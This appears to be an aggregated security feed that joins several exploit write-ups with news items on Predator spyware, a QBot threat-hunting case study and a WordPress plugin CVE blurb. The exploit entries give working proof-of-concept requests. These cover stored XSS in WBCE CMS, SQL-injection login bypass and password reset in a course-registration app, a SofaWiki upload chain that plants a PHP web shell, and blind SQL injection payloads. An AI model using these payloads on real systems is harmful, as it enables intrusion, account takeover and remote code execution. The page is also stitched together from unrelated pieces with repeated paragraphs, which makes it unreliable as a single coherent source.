WBCE CMS version 1.6.1 suffers from a cross site scripting vulnerability.

    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)Version: 1.6.1Bugs:  XSSTechnology: PHPVendor URL: https://wbce-cms.org/Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1Date of found: 03-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1Host: localhostContent-Length: 976sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-platform: "Linux"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtOAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167Connection: close------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="reqid"187de34ea92ac------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="cmd"upload------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="target"l1_Lw------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="mtime[]"1683056102------WebKitFormBoundary5u4r3pOGl4EnuBtO--3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)========================================================================================================================###XSS-2###1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)2. add page3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3Epoc request:POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1Host: localhostContent-Length: 143Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475Connection: closepage_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

WBCE CMS 1.6.1 Cross Site Scripting

Security researchers have shared a deep dive into the commercial Android spyware called Predator, which is marketed by the Israeli company Intellexa (previously Cytrox).
Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.
The spyware, which is delivered by means of

Security researchers have shared a deep dive into the commercial Android spyware called Predator, which is marketed by the Israeli company **Intellexa** (previously Cytrox).

Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android.

The spyware, which is delivered by means of another loader component called Alien, is equipped to record audio from phone calls and VoIP-based apps as well as gather contacts and messages, including from Signal, WhatsApp, and Telegram.

Its other functionalities allow it to hide applications and prevent applications from being executed upon rebooting the handset.

"A deep dive into both spyware components indicates that Alien is more than just a loader for Predator and actively sets up the low-level capabilities needed for Predator to spy on its victims," Cisco Talos said in a technical report.

Spyware like Predator and NSO Group's Pegasus are carefully delivered as part of highly-targeted attacks by weaponizing what are called zero-click exploit chains that typically require no interaction from the victims and allow for code execution and privilege escalation.

"Predator is an interesting piece of mercenary spyware that has been around since at least 2019, designed to be flexible so that new Python-based modules can be delivered without the need for repeated exploitation, thus making it especially versatile and dangerous," Talos explained.

Both Predator and Alien are designed to get around security guardrails in Android, with the latter loaded into a core Android process called Zygote to download and launch other spyware modules, counting Predator, from an external server.

It's currently not clear how Alien is activated on an infected device in the first place. However, it's suspected to be loaded from shellcode that's executed by taking advantage of initial-stage exploits.

"Alien is not just a loader but also an executor — its multiple threads will keep reading commands coming from Predator and executing them, providing the spyware with the means to bypass some of the Android framework security features," the company said.

The various Python modules associated with Predator make it possible to accomplish a wide array of tasks such as information theft, surveillance, remote access, and arbitrary code execution.

The spyware, which arrives as an ELF binary before setting up a Python runtime environment, can also add certificates to the store and enumerate the contents of various directories on disk if it's running on a device manufactured by Samsung, Huawei, Oppo, or Xiaomi.

That said, there are still many missing pieces that could help complete the attack puzzle. This comprises a main module called tcore and a privilege escalation mechanism dubbed kmem, both of which have remained elusive to obtain thus far.

Cisco Talos theorized that tcore could have implemented other features like geolocation tracking, camera access, and simulating a shutdown to covertly spy on victims.

The findings come as threat actors' use of commercial spyware has witnessed a surge in recent years just as the number of cyber mercenary companies supplying these services are on an upward trajectory.

While these sophisticated tools are intended for exclusive use by governments to counter serious crime and combat national security threats, they have also been abused by customers to surveil on dissidents, human rights activists, journalists, and other members of the civil society.

As a case in point, digital rights group Access Now said that it uncovered evidence of Pegasus targeting a dozen people in Armenia – including an NGO worker, two journalists, a United Nations official, and a human rights ombudsperson in Armenia. One of the victims was hacked at least 27 times between October 2020 and July 2021.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

"This is the first documented evidence of the use of Pegasus spyware in an international war context," Access Now said, adding it began an investigation after Apple sent notifications to the individuals in question that they may have been a victim of state-sponsored spyware attacks in November 2021.

There are no conclusive links that connect the spyware use to a specific government agency in either Armenia or Azerbaijan. It's worth noting that Armenia was outed as a customer of Intellexa by Meta in December 2021 in attacks aimed at politicians and journalists in the nation.

What's more, cybersecurity company Check Point earlier this year disclosed that various Armenian entities have been infected with a Windows backdoor referred to as OxtaRAT as part of an espionage campaign aligned with Azerbaijani interests.

In a more unusual turn of events, The New York Times and The Washington Post reported this week that the Mexican government may be spying on itself by using Pegasus against a senior official in charge of investigating alleged military abuses.

Mexico is also the first and most prolific user of Pegasus, despite its promises to cease the illegal use of the notorious spyware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Predator Android Spyware: Researchers Sound the Alarm on Alarming Capabilities

2023 Online Course Registration version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing## Author: nu11secur1ty## Date: 05.25.2023## Vendor: https://github.com/nikhilkeshava## Software: https://github.com/nikhilkeshava/online-course-registration-## Reference: https://portswigger.net/web-security/sql-injection,https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The `username` parameter appears to be vulnerable to SQL injectionattacks. The payloads 77834251' or 6127=6127-- and 98762777' or4535=4542-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isunsafely incorporated into a SQL query. The attacker can use thisbypass login vulnerability to send a remote POST request to set a newadministrator password for himself, which is absolutely nasty.STATUS: HIGH Vulnerability[+]Payload:```POSTPOST /online-course-registration/admin/index.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Exploit:```POSTPOST /online-course-registration/admin/change-password.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 58Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/change-password.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closecpass=password&newpass=password5&cnfpass=password5&submit=```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)## Time spend:01:15:00

2023 Online Course Registration 1.0 SQL Injection

Commercial spyware use is on the rise, with actors leveraging these sophisticated tools to conduct surveillance operations against a growing number of targets. Cisco Talos has new details of a commercial spyware product sold by the spyware firm Intellexa (formerly known as Cytrox).

Mercenary mayhem: A technical analysis of Intellexa's PREDATOR spyware

SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.

1.  The PHP file an be uploaded directly by matching referer.

    // index.php
    case 'uploadbigfile':   		if ($user->hasright('upload', '') || stristr($swBaseHrefFolder,$referer))
    							{
    									include 'inc/special/uploadbigfile.php';
    							}
    

    // uploadbigfile.php
    if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
    {	 
    	 $filename = $_FILES['uploadedfile']['name'];
    	 $newfile = $swRoot.'/site/uploadbig/'.$filename;
    	 move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
    	 
    	 $checksum = md5_file($newfile);
    	 if ($checksum == $filename)
    	 {
    		 echo 'upload ok '.$filename;
    	 }
    	 else
    	 {
    		 echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
    		 unlink($newfile);
    	 }
    	 
    	 $_FILES = null;
    	 
    	 exit();
    }
    

2.  Send a request package to get checksum.

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 243
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="idontknow"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

3.  Send three request packets using checksum to create a malicious PHP file.

> 1st

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 283
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="checkchunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
    

> 2nd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 266
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

> 3rd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 574
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="composechunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="comment"
    
    test
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="uploadtime"
    
    1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="start"
    
    0
    ------WebKitFormBoundaryfeK0BammsIbqUGBr--
    

4.  After uploading a malicious PHP file, arbitrary code can be executed.

CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki

Quicklancer version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Quicklancer v1.0 - SQL Injection# Date: 2023-05-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor:https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135# Demo Site: https://quicklancer.bylancer.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /php/user-ajax.php HTTP/1.1Content-Type: application/x-www-form-urlencodedAccept: */*x-requested-with: XMLHttpRequestReferer: https://localhostCookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;quickjob_view_counted=31; Quick_lang=arabicContent-Length: 93Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-aliveaction=searchStateCountry&dataString=deneme### Parameter & Payloads ###Parameter: dataString (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

Quicklancer 1.0 SQL Injection

Categories: Business
How Malwarebytes MDR successfully helped a company detect and respond to the potent banking Trojan QBot.



(Read more...)




The post Tracking down a trojan: An inside look at threat hunting in a corporate network appeared first on Malwarebytes Labs.

At Malwarebytes, we talk a lot about the importance of threat hunting for SMBs—and not for no good reason, either. Just consider the fact that, when a threat actor breaches a network, they don’t attack right away. The median amount of time between system compromise and detection is 21 days.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed.

Threat hunting helps find and remediate highly-obfuscated threats like these that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

The bad news for small-to-medium sized businesses (SMBs): Manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC).

That’s where Malwarebytes Managed Detection and Response (MDR) comes in.

Malwarebytes MDR is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack.

But talk is cheap: let’s look at a real time where Malwarebytes MDR successfully helped a company detect and respond to a potent banking Trojan known as QBot.

**The Incident**

On a date left undisclosed for security reasons, a reputable oil and gas company we’ll refer to as Company 1 experienced an intrusion in their network. The culprit was **Qakbot** (also known as QBot).

QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. What's more, it also facilitates remote access to the compromised machines.

QBot has recently been observed being distributed as part of a phishing campaign using PDFs and Windows Script Files (WSF).

The QBot campaign illustrated (Source: Jerome Segura | Malwarebytes Labs)

QBot attacks start with a reply-chain phishing email, when threat actors reply to a chain of emails with a malicious link or attachment.

A sample reply-chain phishing email in French, carrying a PDF attachment disguised as a cancellation letter. (Source: BleepingComputer)

Once someone in the email chain opens the attached PDF, they see a message saying, "This document contains protected files, to display them, click on the 'open' button." Clicking the button downloads a ZIP file containing the WSF script.

The heavily obfuscated script contains a mix of JS and VBScript code that, when run, triggers a PowerShell that then downloads the QBot DLL from a list of hardcoded URLs. This script tries each URL until a file is downloaded to the Windows Temp folder (%TEMP%) and executed.

Once QBot runs, it issues a PING command to check for an internet connection. It then injects itself into wermgr.exe, a legitimate Windows Error Manager program, to run quietly in the background.

**The Infection**

The initial infection at Company 1 was traced to a laptop in their network.The Qakbot malware used **Windows Script File (WSF), executed by WSCRIPT.EXE, to launch a PowerShell script encoded in Base64.**

The Process Graph tile under the Suspicious Activity page in Nebula shows a visual representation of the files or processes touched by the suspicious activity.

Clicking on the node to view more details, we see WSCRIPT.EXE was used to execute a Windows Script File, which spawned an instance of PS executing a Base64 encoded command.

Node detail showing malicious encoded PowerShell script.

This script was designed to be patient and stealthy.

It first initiated a waiting period of 4 seconds before creating an array of URLs, presumably leading to malicious websites. The malware then attempted to download a file from each URL, with each file being checked for a minimum size of 100,000 bytes, implying a meaningful content requirement. If a download failed, the script would wait for 4 seconds before moving to the next URL.

The downloaded files were executed using the **RUNDLL32.EXE Windows utility, which was invoked from the PowerShell instance**. This allowed the downloaded file, dubbed "**FreeformOzarkite.marseillais**," to load and execute its malicious payload.

RUNDLL32.EXE was invoked from the previous instance of PowerShell to execute a malicious payload or module that is stored in the file "FreeformOzarkite.marseillais" in the temporary folder of the infected user. 

**The Malicious DLL**

A specific DLL file, identified as **zibkwyxdtpcrqshpuqkoomcoba.dll**, was found to be one of the malicious codes executed by the Qakbot infection.

Node detail showing the malicious DLL is executed (zibkwyxdtpcrqshpuqkoomcoba.dll).

Decomposition of this DLL revealed several nefarious functions, including:

*   Code injection into other processes.
*   Harvesting of sensitive data, like Chrome and Outlook passwords, Wi-Fi passwords, and Bitcoin wallets.
*   Capturing screenshots.
*   Modifying system settings, like disabling the User Account Control (UAC), to make the system more vulnerable to further attacks.
*   Communication with a remote command and control (C&C) server for data exfiltration and remote command execution.

The team also saw system enumeration utilizing **WHOAMI.EXE** and **IPCONFIG.EXE**:

*   whoami /all
*   ipconfig /all

**Data Exfiltration and Remediation**

The malware attempted to send the collected data to a known Qakbot C2 IP address. This is presumably where the stolen data would be accumulated and analyzed by the malicious actors.

However, the Malwarebytes MDR team promptly **detected and contained this threat**, taking steps such as cleaning the system of the infection, informing Company 1 of the incident, and providing actionable recommendations to prevent future compromises.

**Threat hunting with MDR**

How Malwarebytes MDR works

Threat hunting is essential for small-and-medium-sized businesses, as attackers can potentially remain undetected for over two weeks after compromising a network.

Unfortunately, threat hunting is complicated and requires a dedicated SOC and seasoned cybersecurity staff, barring most SMBs from utilizing this important security practice. 

In this article, we’ve outlined the significant role that Malwarebytes MDR can play in **uncovering, managing, and remediating threats like Qakbot**, helping you avoid business disruption and financial loss.

Want to learn more about Malwarebytes MDR and threat hunting? Click the link below for a quote. 

**Stop Qbot attacks today**

Tracking down a trojan: An inside look at threat hunting in a corporate network

The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.

****Go Pricing** Current Version 3.3.19 – June 18, 2021****Create amazing WordPress Pricing & Compare Tables**

It’s super easy to create WordPress pricing or compare tables with Go Pricing. If you buy this product, you won’t need anything else.

These WordPress Pricing Tables support various Media Elements like Audio, Video, Image or Map. Just give it a try! We are sure you will never use any other table plugin.

For more information please scroll down!

  
**Key Features**

**Easy to Use Admin Interface** – Edit your tables quickly and swiftly with our clean UI. There are help texts, colours, icons to help you in the efficient navigation.

**Various Media Types** – Make your tables more unique and engaging by adding content types like: Audio, Video or Map.

**Google Fonts** – Take full use of the complete Google font set and find the best matching one to your site.

**2000+ Font Icons** – Font Awesome, Icomoon, Linecon & Material Icons give you scalable vector icons that can be instantly customized, and they will look gorgeous on high-resolution displays.

**Live Preview** – This function will enable you to see how your will look Pricing Table in real time.

**Bulk Actions** – You can perform various operations on the dashboard with multiple tables, like: cloning, exporting, deleting.

**Column Animations** – Give some vibe to your tables! Choose any of the 39 amazing transitions for each and every column according to your taste.

**Customisable Responsivity** – Thanks to the various configuration options you can make sure that your table provides the best possible experience on any device.

**Import & Export functions** – You can swiftly import demo tables, create or restore backups, and move your data between sites.

**Built-in Plugin Update** – You can keep your installed version up to date and utilise all the latest fixes, features and improvements.

**Small Footprint** – You can ensure that the content is only loaded when it is necessary.

**Classic and Modern in one? Yes.**  
If you like traditional _WordPress Pricing Tables_, but you would like to get much more, then you are at the right place. You will get all the usual pricing table features, and our plugin also supports Videos (Youtube, Vimeo, Screenr) and Images optional responsivity. Enjoy this _easy and quick_ way of creating stunning tables, and integrating them into your existing WordPress site was never easier thanks to our Admin Panel. You will surely find the one from our ready made, but customizable demo tables that fits the best for you.

**What else can I do with Go Pricing Tables? We have some ideas.  
**Beside traditional _Pricing Tables_ features the plugin is suitable for creating Team Viewer and Compare Tables. These features can also be found in the package.

**Is the system flexible? Yes.  
**The responsivity is optional. It can be turned On and Off and customizable to adapt to your site or CSS framework (e.g. Bootstrap). You can use System or any Google Web Fonts (650+).

**Can I use more than one table on my site? Yes.**  
You can use any number of tables on your site, or even on one single page using shortcodes.

**Style & Layout**

*   Column Animation  
    *   Column Transition
    *   Price Counter
*   Text based ribbon (CSS)  
*   Unlimited colors and color combination of columns
*   Unlimited and different number of rows in Body and Footer
*   Any number of columns up to 10
*   Configurable column space and border radius
*   Standard and circle Header Styles
*   Advanced row and column height Equalization System
*   Numerous column shadow and sign options
*   Unlimited buttons in Body and Footer
*   Unique tooltip style
*   Paypal and s2Member button shortcode support
*   650+ Google Web Font
*   1900+ Font icons  
    *   Font Awesome
    *   Icomoon
    *   Linecon
    *   Material Icons
*   250+ Starter Template
    *   90+ Classic Style
    *   150+ Clean Style

**Responsivity**

*   Optional and customizable responsivity per tables
*   Configurable Breakpoints and number of columns

*   Responsive Images
*   Audio
    *   SoundCloud
    *   Mixcloud
    *   Beatport
    *   HTML5 audio
*   Video
    *   YouTube
    *   Vimeo
    *   Screenr
    *   Dailymotion
    *   Metacafe
    *   HTML5 video
*   Google Map – Classic, Clean and custom pins
*   Custom iFrame

**Modern user-friendly Admin Interface**

*   Optionally Ajaxified Admin
*   Help System
*   Advanced Table Dashboard
    *   Searching and Sorting possibilities
    *   Cloning and Deleting bulk actions
*   Update Notification and built-in Update functionality  
*   Visual Table Editor – Sort, Delete and Clone columns and rows
*   Advanced data Export and Import
*   Built-in Live Preview with responsivity settings
*   Visual Composer compatibility

**Supports the Latest Web Technologies**

*   Supports all modern browsers on the market
    *   Chrome
    *   Firefox
    *   Safari
    *   Opera
    *   Internet Explorer (9+)
*   Touch support for mobile devices, including iOS, Android, and Windows

**Other**

*   Layered PSDs for signs and pins
*   Translation ready with .mo .po files

**Quality & Originality**

Our goal is the best quality, however issues may occur which we try to fix quickly. We continuously monitor customer feedbacks and suggestions. Always use the latest version of this product.

  
**Changelog**

**v3.3.19 – June 18, 2021**

*   \[FIX\] PHP 7.4 compatibility issues fix in frontend
*   \[FIX\] Minor backend CSS fixes

**v3.3.18 – December 28, 2020**

*   \[FIX\] WordPress 5.6 compatibility issues fix in backend and frontend
*   \[FIX\] Minor frontend JavaScript fixes

**v3.3.17 – March 05, 2020**

*   \[IMPROVEMENT\] New tooltip position possibilities and automatic alignment on mobiles
*   \[FIX\] Fix for tooltip “cut-off” issue on mobiles

**v3.3.16 – November 14, 2019**

*   \[FIX\] WordPress 5.3 compatibility issue fix

**v3.3.15 – July 8, 2019**

*   \[IMPROVEMENT\] Minor improvements in PHP code
*   \[IMPROVEMENT\] Cornerstone Page Builder integration

**v3.3.14 – Jan 21, 2019**

*   \[FIX\] PHP 7+ Compatibility issue fix
*   \[IMPROVEMENT\] Minor CSS improvement in the frontend CSS

**v3.3.13 – Aug 16, 2018**

*   \[IMPROVEMENT\] Improved API caching to prevent slow down of the admin page loading if API is unavailable

We are frequently releasing new features and bufixes to the plugin, so it is strongly recommended to keep it up do date, to make sure that you utilise all the latest fixes, features and improvements!

**View our Changelog details**

CVE-2023-2494: Go Pricing - WordPress Responsive Pricing Tables

SourceCodester Employee and Visitor Gate Pass Logging System v1.0 is vulnerable to SQL Injection via /employee_gatepass/classes/Login.php.

**BUG\_Author:**

**ZongXin Li**

**Affected version:**

EMPLOYEE AND VISITOR GATE PASS LOGGING SYSTEM - 1.0

**Vendor:**

https://www.sourcecodester.com/users/tips23

**Software:**

https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html

**Vulnerability File:**

/employee\_gatepass/classes/Login.php

**Description:**

The system Employee and Visitor Gate Pass Logging 1.0 is vulnerable to SQL Injection via /employee\_gatepass/classes/Login.php. The parameter username is not sanitized correctly. The malicious actor can use this vulnerability to manipulate the administrator account of the systemand can take full control of the information about the other accounts. Status: CRITICAL

GET parameter 'username' exists SQL injection vulnerability

Payload1:username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123

